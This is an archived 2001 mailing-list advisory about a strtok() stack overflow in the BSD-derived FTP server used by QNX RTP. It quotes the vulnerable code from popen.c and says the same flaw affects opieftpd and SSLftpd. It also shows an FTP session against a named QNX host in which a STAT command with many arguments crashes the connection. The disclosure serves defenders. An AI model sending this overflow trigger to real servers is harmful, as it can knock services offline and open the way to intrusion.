OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Przemyslaw Frasunek (venglinFREEBSD.LUBLIN.PL)
Date: Fri Feb 02 2001 - 13:03:09 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    QNX RTP uses a BSD derived FTP server, which is vulnerable to strtok()
    based stack overflow.

    Offending code from ftpd/popen.c:

            char **pop, *argv[100], *gargv[1000], *vv[2];

            for (argc = 0, cp = program;; cp = NULL)
                    if (!(argv[argc++] = strtok(cp, " \t\n")))
                            break;

            /* glob each piece */
            gargv[0] = argv[0];
            for (gargc = argc = 1; argv[argc]; argc++) {
                argv[argc] = strdup(argv[argc]);

    Code is called, when STAT command is issued. Overflow occurs, when large
    number of arguments is applied.

    Identifing vulnerable system:

    220 quics.qnx.com FTP server (Version 5.60) ready.
    user ftp
    331 Guest login ok, send ident as password.
    pass dupa
    230 Guest login ok, access restrictions apply.
    stat a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
    Connection closed by foreign host.

    BTW. Old BSD derived ftpd is also used in opieftpd and SSLftpd. Both are
         vulnerable to this attack.

    --
    * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
    * Inet: przemyslawfrasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *